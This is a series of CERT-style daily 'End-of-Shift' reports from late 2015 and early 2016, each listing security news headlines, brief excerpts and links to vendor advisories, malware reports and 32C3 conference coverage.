This updated advisory is a follow-up to the updated advisory titled ICSA-15-344-01A Advantech EKI Vulnerabilities that was published December 15, 2015, on the NCCIC/ICS-CERT web site. This advisory provides information regarding several vulnerabilities in Advantech's EKI devices.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-15-344-01
*** D-Link DCS-931L Arbitrary File Upload ***
---------------------------------------------
Topic: D-Link DCS-931L Arbitrary File Upload Risk: High Text:## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-f...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016010028
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 04-01-2016 18:00 − Tuesday 05-01-2016 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** ProxieBack sneakily uses the victim's server to bypass its own security ***
---------------------------------------------
Palo Alto Networks has come across a new family of proxy-creating malware, called ProxyBack, that the company believes has been in the wild since 2014 and may have more than 20 versions now running.
---------------------------------------------
http://www.scmagazine.com/proxieback-sneakily-uses-the-victims-server-to-by…
*** Hocus-pocus! The stupidity of cybersecurity predictions ***
---------------------------------------------
Every year, some publication asks me to come up with a list of my top 10 predictions for the security field, and every year I tell them they might as well just dust off an article I wrote a year earlier, with maybe a couple of buzzwords and a new technology added on. What you can generally expect in any given year is more of the same, with some slight variations. That doesn't stop people from making predictions, though. Vendors and supposed experts can't seem to control the urge, but...
---------------------------------------------
http://www.cio.com/article/3019071/security/hocus-pocus-the-stupidity-of-cy…
*** Matthew Garrett: Apple computers are not suitable for confidential work ***
---------------------------------------------
With UEFI Secure Boot and TPMs the boot process of Windows and Linux machines can be secured reasonably well, but this could be improved, says security expert Matthew Garrett. The situation at Apple, on the other hand, is catastrophic.
---------------------------------------------
http://www.golem.de/news/matthew-garrett-apple-rechner-eignen-sich-nicht-fu…
*** Comcast Home Security System Vulnerable to Attack ***
---------------------------------------------
Comcast's Xfinity Home Security System is vulnerable to attacks that interfere with its ability to detect and alert to home intrusions.
---------------------------------------------
http://threatpost.com/comcast-home-security-system-vulnerable-to-attack/115…
*** Using IDAPython to Make Your Life Easier: Part 3 ***
---------------------------------------------
In the first two posts of this series (Part 1 and Part 2), we discussed using IDAPython to make your life as a reverse engineer easier. Now let's look at conditional breakpoints. While debugging in...
---------------------------------------------
http://researchcenter.paloaltonetworks.com/2016/01/using-idapython-to-make-…
*** HTML5 Security Cheat Sheet ***
---------------------------------------------
This OWASP cheat sheet serves as a guide for implementing HTML5 in a secure fashion. Contents include: Communication APIs, Storage APIs, Geolocation, Web Workers, Sandboxed Frames, Offline Applications, and...
---------------------------------------------
http://www.net-security.org/secworld.php?id=19279
*** Nexus Security Bulletin - January 2016 ***
---------------------------------------------
We have released a security update to Nexus devices through an over-the-air (OTA) update as part of our Android Security Bulletin Monthly Release process. [...] The most severe of these issues is a Critical security vulnerability that could enable remote code execution on an affected device through multiple methods such as email, web browsing, and MMS when processing media files.
---------------------------------------------
https://source.android.com/security/bulletin/2016-01-01.html
*** DSA-3432 icedove - security update ***
---------------------------------------------
Multiple security issues have been found in Icedove, Debian's version of the Mozilla Thunderbird mail client: Multiple memory safety errors, integer overflows, buffer overflows and other implementation errors may lead to the execution of arbitrary code or denial of service.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3432
*** Puppet Enterprise Configuration Error Lets Remote Non-Whitelisted Users Access the Target System ***
---------------------------------------------
http://www.securitytracker.com/id/1034550
*** Cisco Security Advisories ***
---------------------------------------------
*** Cisco Jabber STARTTLS Downgrade Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco IOS XR Software OSPF Link State Advertisement PCE Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Prime Infrastructure Frame Injection Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Unified Communications Manager SQL Injection Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in OpenSSL affects Rational Tau (CVE-2015-3194) ***
http://www.ibm.com/support/docview.wss?uid=swg21973108
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Apache Commons affects IBM Kenexa LCMS Premier on Cloud (CVE-2015-7450) ***
http://www.ibm.com/support/docview.wss?uid=swg21972649
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSource Dojo ToolKit affects IBM InfoSphere Master Data Management (CVE-2015-5654) ***
http://www.ibm.com/support/docview.wss?uid=swg21972787
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect WebSphere Partner Gateway Advanced/Enterprise editions (CVE-2015-4872) ***
http://www.ibm.com/support/docview.wss?uid=swg21973241
---------------------------------------------
*** IBM Security Bulletin: The Elastic Storage Server and the GPFS Storage Server are affected by a vulnerability in IBM Spectrum Scale (CVE-2015-7456) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005574
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM TRIRIGA Application Platform (CVE-2015-7450) ***
http://www.ibm.com/support/docview.wss?uid=swg21972369
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Access Manager for Web and IBM Tivoli Access Manager for e-business ***
http://www.ibm.com/support/docview.wss?uid=swg21973135
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Cognos Command Center (CVE-2015-5006, CVE-2015-4872) ***
http://www.ibm.com/support/docview.wss?uid=swg21972446
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in the IBM Java SDK affects IBM Rational Application Developer for WebSphere Software (CVE-2015-4872) ***
http://www.ibm.com/support/docview.wss?uid=swg21973785
---------------------------------------------
*** IBM Security Bulletin: IBM Tealeaf Customer Experience allows unauthorized access to system files (CVE-2015-4988) ***
http://www.ibm.com/support/docview.wss?uid=swg21968868
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in the IBM Java SDK affects IBM Rational Application Developer for WebSphere Software (CVE-2015-2613, CVE-2015-2601, CVE-2015-2625, CVE-2015-1931) ***
http://www.ibm.com/support/docview.wss?uid=swg21972455
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in OpenSSL affects IBM PureApplication System (CVE-2015-1788) ***
http://www.ibm.com/support/docview.wss?uid=swg21974116
---------------------------------------------
*** IBM Security Bulletin: IBM Tealeaf Customer Experience PCA Web UI PHP security issues ***
http://www.ibm.com/support/docview.wss?uid=swg21972384
---------------------------------------------
Next End-of-Shift report on 2016-01-07
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 31-12-2015 18:00 − Monday 04-01-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Identical SSH keys on Hetzner servers ***
---------------------------------------------
Because of identical SSH keys, attackers can eavesdrop on encrypted connections to Hetzner servers.
---------------------------------------------
http://heise.de/-3057777
*** Difficult to block JavaScript-based ransomware can hit all operating systems ***
---------------------------------------------
A new type of ransomware that still goes undetected by the great majority of AV solutions has been spotted and analyzed by Emsisoft researchers (via Google Translate). Ransom32 is delivered on the ...
---------------------------------------------
http://www.net-security.org/malware_news.php?id=3184
http://blog.emsisoft.com/de/2016/01/01/meet-ransom32-the-first-javascript-r…
*** Apple had more CVEs than any single MS product in 2015, but it doesn't really matter ***
---------------------------------------------
Meaningless league table sparks silly schadenfreude. A count of the number of CVEs issued on different platforms in 2015 has concluded that Apple was the most-advisoried operating system of the year, leading to gloating headlines that OS X is the "most vulnerable" of the lot.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/01/04/apple_had_m…
*** Cisco Jabbers in the clear due to STARTTLS bug ***
---------------------------------------------
Sysadmins get a belated Christmas present. 'Twas the night before Christmas, when sysadmins probably weren't watching their advisory feeds, that Cisco announced a vulnerability in its Jabber for Windows.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/01/04/cisco_jabbe…
*** BlackEnergy cyberespionage group adds disk wiper and SSH backdoor to its arsenal ***
---------------------------------------------
A cyberespionage group focused on companies and organizations in the energy sector has recently updated its arsenal with a destructive data-wiping component and a backdoored SSH server. The group is known in the security community as Sandworm or BlackEnergy, after its primary malware tool, and has been active for several years. It has primarily targeted companies that operate industrial control systems, especially in the energy sector, but has also gone after high-level government organizations,...
---------------------------------------------
http://www.cio.com/article/3018790/blackenergy-cyberespionage-group-adds-di…
*** The current state of boot security ***
---------------------------------------------
I gave a presentation at 32C3 this week. One of the things I said was "If any of you are doing seriously confidential work on Apple laptops, stop. For the love of god, please stop." I didn't really have time to go into the details of that at the time, but right now I'm sitting on a plane with a ridiculous sinus headache and the pseudoephedrine hasn't kicked in yet so here we go. The basic premise of my presentation was that it's very difficult to determine whether your system is in a...
---------------------------------------------
http://mjg59.dreamwidth.org/39339.html
*** A Tip For The Analysis Of MIME Files, (Sat, Jan 2nd) ***
---------------------------------------------
I've written a diary entry about malicious MS Office documents stored as MIME files. A few days ago a reader contacted me for a problem he had analyzing such a maldoc MIME file. When he used emldump to analyze his sample (f67aa5a3ede3d31c5a68494c0678e2ee), it was not a multipart: $ ./emldump.py f67aa5a3ede3d31c5a68494c0678e2ee.vir 1: boundary=----=_NextPart_Jm9Ovypy.uUh6MCk charset=us-ascii $ You can make emldump skip this first line with option -H: $ ./emldump.py -H...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20561&rss
*** More Internet of Things irony: a security alarm with alarming security ***
---------------------------------------------
Imagine that a crook could change the text ALARM STATUS RED in your intruder alarm alerts to say ALARM STATUS GREEN...
---------------------------------------------
https://nakedsecurity.sophos.com/2016/01/03/more-internet-of-things-irony-a…
*** DFN-CERT-2016-0001: Mozilla Firefox, Network Security Services: A vulnerability allows bypassing security measures ***
---------------------------------------------
Please note: To fix the vulnerability named here, Mozilla published security advisory MFSA2015-150 on 28 December 2015, but withdrew it a short time later without stating reasons. Firefox version 43.0.3 was released at the same time. Whether the vulnerability named here is actually fixed in that version is therefore unclear. The release notes for Firefox version 43.0.3 do not mention the vulnerability.
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0001/
*** Mozilla Firefox MD5 Signature Support in TLS ServerKeyExchange Messages Exposes Users to Hash Collision Forgery Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1034541
*** DFN-CERT-2016-0004: Mozilla Thunderbird: Multiple vulnerabilities allow, among other things, the execution of arbitrary code ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0004/
*** Bugtraq: OSS-2016-03: Insufficient Integrity Protection in Winkhaus Bluesmart locking systems using Hitag S ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537223
*** Bugtraq: OSS-2016-02: Weak authentication in NXP Hitag S transponder allows an attacker to read, write and clone any tag ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537224
*** Bugtraq: Confluence Vulnerabilities ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537232
*** DSA-3433 samba - security update ***
---------------------------------------------
Several vulnerabilities have been discovered in Samba, an SMB/CIFS file, print, and login server for Unix. The Common Vulnerabilities and Exposures project identifies the following issues:
---------------------------------------------
https://www.debian.org/security/2016/dsa-3433
*** PCRE Heap Overflow in pcre_compile2() in Processing Certain Regex Patterns May Let Remote Users Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1034555
*** #2015-012 Ganeti multiple issues ***
---------------------------------------------
Ganeti, an open source virtualization manager, suffers from multiple issues in its RESTful control interface (RAPI).
---------------------------------------------
http://www.ocert.org/advisories/ocert-2015-012.html
=======================
= End-of-Shift Report =
=======================
Timeframe: Tuesday 29-12-2015 18:00 − Wednesday 30-12-2015 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Microsoft may have your encryption key; here's how to take it back ***
---------------------------------------------
It doesn't require you to buy a new copy of Windows.
---------------------------------------------
http://arstechnica.com/information-technology/2015/12/microsoft-may-have-yo…
*** Actor using Rig EK to deliver Qbot - update, (Wed, Dec 30th) ***
---------------------------------------------
Introduction: This diary is a follow-up to my previous diary on the actor using Rig exploit kit (EK) to deliver Qbot [1]. For this diary, I've infected more Windows hosts from other compromised websites, so we have additional data on this actor. As previously noted, this actor has been delivering Qbot (also known as Qakbot) malware. The actor uses a gate to route traffic from the compromised website to the EK landing page. In this case, the gate returns a variable that is translated to a URL for...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20551&rss
*** The Truth is in Your Logs! ***
---------------------------------------------
Keeping an eye on logs is boring... but mandatory! Hopefully, sometimes it can reveal funny stuff! It looks like people at the CCC are having some fun too while their annual conference is ongoing... Here is what I got in my Apache logs this morning: 151.217.177.200 - - [30/Dec/2015:06:51:22 +0100] "DELETE your logs. \ Delete your installations. Wipe everything clean. Walk out into the...
---------------------------------------------
https://blog.rootshell.be/2015/12/30/the-truth-is-in-your-logs/
*** Killed by Proxy: Analyzing Client-end TLS Interception Software ***
---------------------------------------------
Topic: Killed by Proxy: Analyzing Client-end TLS Interception Software Risk: Medium Text:Abstract—To filter SSL/TLS-protected traffic, some antivirus and parental-control applications interpose a TLS proxy in the...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2015120310
*** 32C3: Automated security tests for the Internet of Things ***
---------------------------------------------
A French-German research team has developed an emulation environment that allows dynamic penetration tests of the firmware of networked electronic devices to be carried out automatically. The first results speak for themselves.
---------------------------------------------
http://heise.de/-3056880
*** Cloud Computing: Attacks Vectors and Counter Measures ***
---------------------------------------------
I can bet that some of you might have missed the news about Star Wars, but there will be hardly any who do not know what Cloud computing is, as this has been the buzz for last several years. In this article, we will learn about various types of attacks that are possible in a...
---------------------------------------------
http://resources.infosecinstitute.com/cloud-computing-attacks-vectors-and-c…
*** Chrome: Google developer picks apart antivirus add-on ***
---------------------------------------------
A Chrome extension from the antivirus vendor AVG had so many security holes that it could just as well have been malware, writes a Google developer. The bugs have been fixed, but the add-on could still be banned from the Chrome store.
---------------------------------------------
http://www.golem.de/news/chrome-google-entwickler-zerpflueckt-antiviren-add…
*** Misconfigured databases, a growing threat ***
---------------------------------------------
It has become commonplace to find misconfigured databases exposed to the public Internet. Last summer alone - 1,175 terabytes (approximately 1.1 petabytes) of data was left wide open for the amusement of inquiring minds and malicious hackers alike - ranging from SMBs to Fortune 500 companies.
---------------------------------------------
http://darkmatters.norsecorp.com/2015/12/29/misconfigured-databases-a-growi…
*** Mobile malware review for 2015 ***
---------------------------------------------
December 30, 2015. The last year proved to be another challenging period for smartphone and tablet owners. Cybercriminals continued to target users of Android devices - thus, the majority of "mobile" threats and unwanted software discovered in 2015 were intended for this platform. In particular, banking Trojans, Android ransomware, advertising modules, and SMS Trojans expanded their activity. Besides, this year witnessed a growing number of malware pre-installed into...
---------------------------------------------
http://news.drweb.com/show/?i=9779&lng=en&c=9
*** Using IDAPython to Make Your Life Easier: Part 1 ***
---------------------------------------------
As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2...
---------------------------------------------
http://researchcenter.paloaltonetworks.com/2015/12/using-idapython-to-make-…
*** The weird and wacky of 2015: strange security and privacy stories ***
---------------------------------------------
These wacky stories remind us how important cybersecurity and online privacy have become in all areas of our lives.
---------------------------------------------
https://nakedsecurity.sophos.com/2015/12/29/the-weird-and-wacky-of-2015-str…
*** Steam blows as games websites security collapse ***
---------------------------------------------
Christmas hiccup on gaming platform exposed user information to others
---------------------------------------------
http://www.scmagazine.com/steam-blows-as-games-websites-security-collapse/a…
*** 2755801 - Update for Vulnerabilities in Adobe Flash Player in Internet Explorer and Microsoft Edge - Version: 52.0 ***
---------------------------------------------
https://technet.microsoft.com/en-us/library/security/2755801
*** PHP Class Name Format String Flaw Lets Remote Users Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1034543
*** Security Advisory: Apache HTTPD vulnerability CVE-2010-2791 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/23/sol23332326.html?…
*** Security Advisory: Apache vulnerability CVE-2011-3639 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/20/sol20979231.html?…
*** AVG Anti-Virus Flaws in Web TuneUp Chrome Extension Lets Remote Users Obtain Potentially Sensitive Information on the Target System ***
---------------------------------------------
http://www.securitytracker.com/id/1034547
Next End-of-Shift Report on 2016-01-04.
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 28-12-2015 18:00 − Tuesday 29-12-2015 18:00
Handler: L. Aaron Kaplan
Co-Handler: Stephan Richter
*** Security Updates Available for Adobe Flash Player (APSB16-01) ***
---------------------------------------------
A security bulletin (APSB16-01) has been published regarding security updates for Adobe Flash Player. These updates address critical vulnerabilities that could potentially allow an attacker to take control of the affected system. Adobe is aware of a report that an...
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1305
*** Quick Tips to Protect Your New (and old) Apple Devices ***
---------------------------------------------
Apple has projected yet another record holiday for sales, but this should come as no surprise to fellow "Macheads". I myself am a huge fan of Apple and have been for a quite...
---------------------------------------------
http://www.webroot.com/blog/2015/12/28/18251/
*** 2016 Reality: Lazy Authentication Still the Norm ***
---------------------------------------------
My PayPal account was hacked on Christmas Eve. The perpetrator tried to further stir up trouble by sending my PayPal funds to a hacker gang that recruits for the terrorist group ISIS. Although the intruder failed to siphon any funds, the successful takeover of the account speaks volumes about why most organizations -- including many financial institutions -- remain woefully behind the times in authenticating their customers and staying ahead of identity thieves.
---------------------------------------------
http://krebsonsecurity.com/2015/12/2016-reality-lazy-authentication-still-t…
*** An Overview of the Upcoming libModSecurity ***
---------------------------------------------
libModSecurity is a major rewrite of ModSecurity. It preserves the rich syntax and feature set of ModSecurity while delivering improved performance, stability, and a new experience in easy integration on different. libModSecurity - Motivations: While ModSecurity version 2.9.0 is available...
---------------------------------------------
http://trustwave.com/Resources/SpiderLabs-Blog/An-Overview-of-the-Upcoming-…
*** Researchers: Pacemakers vulnerable to hacker attacks and software bugs ***
---------------------------------------------
Researcher and patient Marie Moe spoke about the topic at the 32C3 hacker congress
---------------------------------------------
http://derstandard.at/2000028215506
*** Let's Encrypt: A free certificate every two seconds ***
---------------------------------------------
The launch of the new certificate authority Let's Encrypt has apparently gone quite well. After only about a month of beta operation, the project is already the fifth-largest CA in the world. But there are still some tasks to tackle.
---------------------------------------------
http://www.golem.de/news/let-s-encrypt-ein-kostenfreies-zertifikat-alle-zwe…
*** 32C3: Sparkasse's pushTAN app still vulnerable ***
---------------------------------------------
A cat-and-mouse game over the online banking app "pushTAN" has developed between security researchers from Erlangen and the Sparkasse association. The latest version can still be attacked fairly easily, experts say.
---------------------------------------------
http://heise.de/-3056667
*** 32C3: Encryption of common RFID locking systems cracked ***
---------------------------------------------
According to security experts, RFID transponder cards used for electronic access control can often be cloned "trivially easily".
---------------------------------------------
http://heise.de/-3056646
*** ATM skimming in retreat ***
---------------------------------------------
The billions invested by banks and retailers in more security are having an effect: data thieves are succeeding less and less often at ATMs in Germany. But the criminals are still finding holes in the system.
---------------------------------------------
http://heise.de/-3056638
*** Microsoft Has Your Encryption Key If You Use Windows 10 ***
---------------------------------------------
An anonymous reader writes with this bit of news from the Intercept. If you log in to Windows 10 using your Microsoft account, your computer automatically uploads a copy of your recovery key to Microsoft's servers. From the article: "The fact that new Windows devices require users to backup their recovery key on Microsoft's servers is remarkably similar to a key escrow system, but with an important difference. Users can choose to delete recovery keys from their Microsoft accounts...
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/YfNKeGMMq1o/microsoft-has-y…
*** Voice over LTE: Attacks on mobile IP telephony presented ***
---------------------------------------------
Talks that cause nightmares about mobile communication are a tradition at the CCC. This time two Korean students demonstrated attacks on Voice over LTE. In Germany this is allegedly not possible.
---------------------------------------------
http://www.golem.de/news/voice-over-lte-mobile-ip-telefonie-kann-abgehoert-…
*** Fixing JavaScript's Broken Random Number Generator ***
---------------------------------------------
szczys writes: It is surprising to learn how broken the JavaScript Random Number Generator has been for the past six years. The problem is compounded by the fact that Node.js uses the same broken Math.random() module. Learning about why this is broken is interesting, but perhaps even more interesting is how the bad code got there in the first place. It seems that a forum thread from way back in 1999 shared two versions of the code. If you read to the end of the thread you got the working
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/GG87DY0k6I4/fixing-javascri…
*** DFN-CERT-2015-2002: Roundcubemail: Two vulnerabilities allow, among other things, the execution of arbitrary code ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2015-2002/
*** libtiff bmp file Heap Overflow ***
---------------------------------------------
Topic: libtiff bmp file Heap Overflow Risk: High Text:Details = Product: libtiff Affected Versions: <= 4.0.6 Vulnerability Type: Heap Overflow Security Risk: High Vendor U...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2015120304
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 23-12-2015 18:00 − Monday 28-12-2015 18:00
Handler: L. Aaron Kaplan
Co-Handler: Stephan Richter
*** Malware-Driven Card Breach at Hyatt Hotels ***
---------------------------------------------
Hyatt Hotels Corporation said today it recently discovered malicious software designed to steal credit card data on computers that operate the payment processing systems for Hyatt-managed locations.
---------------------------------------------
http://krebsonsecurity.com/2015/12/malware-driven-card-breach-at-hyatt-hote…
*** Using WPScan: Finding WordPress Vulnerabilities ***
---------------------------------------------
When using WPScan you can scan your WordPress website for known vulnerabilities within the core version, plugins, and themes. You can also find out if any weak passwords, users, and security configuration issues are present. The database at wpvulndb.com is used to check for vulnerable software and the WPScan team maintains the ever-growing list of...
---------------------------------------------
https://blog.sucuri.net/2015/12/using-wpscan-finding-wordpress-vulnerabilit…
*** NSA and GCHQ have been using backdoors in Juniper firewalls for years ***
---------------------------------------------
Secret document from 2011 shows cooperation between the two intelligence agencies
---------------------------------------------
http://derstandard.at/2000028055853
*** Victims of the Gomasom Ransomware can now decrypt their files for free ***
---------------------------------------------
Fabian Wosar, security researcher at Emsisoft, created a tool for decrypting files locked by the Gomasom Ransomware. Ransomware is among the most threatening cyber threats for end-users, but today I have good news for victims of the Gomasom ransomware: victims can rescue their locked files. The news was spread by the security researcher Fabian Wosar, who developed a...
---------------------------------------------
http://securityaffairs.co/wordpress/43074/malware/decrypt-gomasom-ransomwar…
*** Hackers demonstrate massive flaws in debit (Bankomat) cards ***
---------------------------------------------
PIN read out in front of an audience, prepaid card topped up and payments redirected
---------------------------------------------
http://derstandard.at/2000028162750
*** 32C3: Hardware Trojans as an underestimated danger ***
---------------------------------------------
Backdoors built permanently into IT devices and chips pose a "serious threat", security experts warned at the hacker conference. Although they can only be installed with great effort, they are also hard to find.
---------------------------------------------
http://heise.de/-3056452
*** 32C3: Dieselgate and the ominous acoustic function ***
---------------------------------------------
Can the manipulation of emissions values at Volkswagen really be the work of individual engineers? At the CCC congress, an insider and a hacker rejected this legend.
---------------------------------------------
http://heise.de/-3056438
*** 32C3: Automatic train protection and networked railway technology in hackers' sights ***
---------------------------------------------
A hacker group that focuses on industrial installations has identified various attack surfaces around networked train control systems. Outdated software and insecure passwords are said to be found "everywhere" there.
---------------------------------------------
http://heise.de/-3056484
*** DSA-3430 libxml2 - security update ***
---------------------------------------------
Several vulnerabilities were discovered in libxml2, a library providing support to read, modify and write XML and HTML files. A remote attacker could provide a specially crafted XML or HTML file that, when processed by an application using libxml2, would cause that application to use an excessive amount of CPU, leak potentially sensitive information, or crash the application.
---------------------------------------------
https://www.debian.org/security/2015/dsa-3430
*** GIT git-remote-ext Helper URL Processing Lets Remote Users Execute Arbitrary Commands on the Target System ***
---------------------------------------------
http://www.securitytracker.com/id/1034501
*** F5 Security Advisory: Apache vulnerability CVE-2010-0434 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/40/sol40284849.html?…
*** EMC Secure Remote Services Virtual Edition Directory Traversal Flaw Lets Remote Authenticated Users View Files on the Target System ***
---------------------------------------------
http://www.securitytracker.com/id/1034530
*** Cisco Jabber for Windows STARTTLS Downgrade Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Vuln: Dnsmasq CVE-2015-3294 Remote Denial of Service Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/74452
*** IDM 4.5 - 4.0.2 Midrange Driver Patch 4.0.2 ***
---------------------------------------------
Abstract: Identity Manager Midrange: IBM i (i5/OS and OS/400) driver patch for the Identity Manager versions 4.0.2 or higher. Driver version will show: i5os Driver Version 4.0.2; IDM 4.0.2 Build Date 20151207_1437; IDM 4.5.x Build Date 201512071006. To see the version run I5OSDRV/I5OSDRV OPTION(*VERSION). Document ID: 5230811. Security Alert: Yes. Distribution Type: Field Test File. Entitlement Required: No. Files: idm45-402midrangepatch2.tar.gz (96.31 MB). Products: Identity Manager 4.0.2, Identity Manager...
---------------------------------------------
https://download.novell.com/Download?buildid=HsE3grsz-TU~
*** DFN-CERT-2015-1999: libvirt: A vulnerability allows the manipulation of files ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2015-1999/
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in Websphere Liberty Profile (WLP) affect Power Management Console (CVE-2015-2017, CVE-2015-1927, CVE-2015-4938) ***
http://www.ibm.com/support/docview.wss?uid=nas8N1021040
---------------------------------------------
*** IBM Security Bulletin: Information disclosure vulnerability affects IBM Sterling B2B Integrator (CVE-2015-7410) ***
http://www.ibm.com/support/docview.wss?uid=swg21972676
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Linux-PAM affects PowerKVM (CVE-2015-3238) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022880
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in pam affect Power Management Console (CVE-2015-3238) ***
http://www.ibm.com/support/docview.wss?uid=nas8N1021041
---------------------------------------------
*** IBM Security Bulletin: A denial of service vulnerability affects IBM Sterling B2B Integrator (CVE-2014-0050) ***
http://www.ibm.com/support/docview.wss?uid=swg21972944
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK including Logjam affect IBM PureApplication System. (CVE-2015-4000, CVE-2015-2613, CVE-2015-2601, CVE-2015-2625, and CVE-2015-1931) ***
http://www.ibm.com/support/docview.wss?uid=swg21973591
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Rational Synergy (CVE-2015-2613, CVE-2015-2601, CVE-2015-2625, CVE-2015-1931 and CVE-2015-4872) ***
http://www.ibm.com/support/docview.wss?uid=swg21973439
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affects IBM Integration Designer and WebSphere Integration Developer (CVE-2015-2613, CVE-2015-2601, CVE-2015-2625, CVE-2015-1931, CVE-2015-4872) ***
http://www.ibm.com/support/docview.wss?uid=swg21972087
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities affects multiple IBM Rational products based on IBM Jazz technology (CVE-2015-4962, CVE-2015-4946) ***
http://www.ibm.com/support/docview.wss?uid=swg21973404
---------------------------------------------
*** IBM Security Bulletin: Malformed ECParameters causes infinite loop (CVE-2015-1788) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023038
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities affect AppScan Enterprise ***
http://www.ibm.com/support/docview.wss?uid=swg21972830
---------------------------------------------
*** IBM Security Bulletin: Clickjack vulnerability affects multiple IBM Rational products based on IBM Jazz technology (CVE-2015-1928) ***
http://www.ibm.com/support/docview.wss?uid=swg21973200
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in OpenSSL affects IBM Content Manager Enterprise Edition (CVE-2015-1788) ***
http://www.ibm.com/support/docview.wss?uid=swg21973416
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSL affect the IBM Tivoli Storage Manager Client and IBM Tivoli Storage Manager for Virtual Environments: Data Protection for VMware (CVE-2014-3569, CVE-2014-3570, CVE-2014-3572, CVE-2014-8275, ***
http://www.ibm.com/support/docview.wss?uid=swg21973383
---------------------------------------------
*** IBM Security Bulletin: Privilege escalation coverage gap in IBM SPSS Statistics (CVE-2015-7489) ***
http://www.ibm.com/support/docview.wss?uid=swg21973502
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Spectrum Scale RAID/IBM GPFS Native RAID (CVE-2015-4843, CVE-2015-4805, CVE-2015-4810, CVE-2015-4806, CVE-2015-4871, CVE-2015-4902) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023034
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Spectrum Scale RAID/IBM GPFS Native RAID (CVE-2015-4843, CVE-2015-4805, CVE-2015-4810, CVE-2015-4806, CVE-2015-4871, CVE-2015-4902) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005474
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM i. ***
http://www.ibm.com/support/docview.wss?uid=nas8N1021047
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Tivoli Monitoring clients (CVE-2015-2590 plus additional CVEs.) ***
http://www.ibm.com/support/docview.wss?uid=swg21964027
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 22-12-2015 18:00 − Wednesday 23-12-2015 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** 2015 Ransomware Wrap-Up ***
---------------------------------------------
Here's a rundown of the innovative ransomware that frightened users and earned attackers big bucks this year.
---------------------------------------------
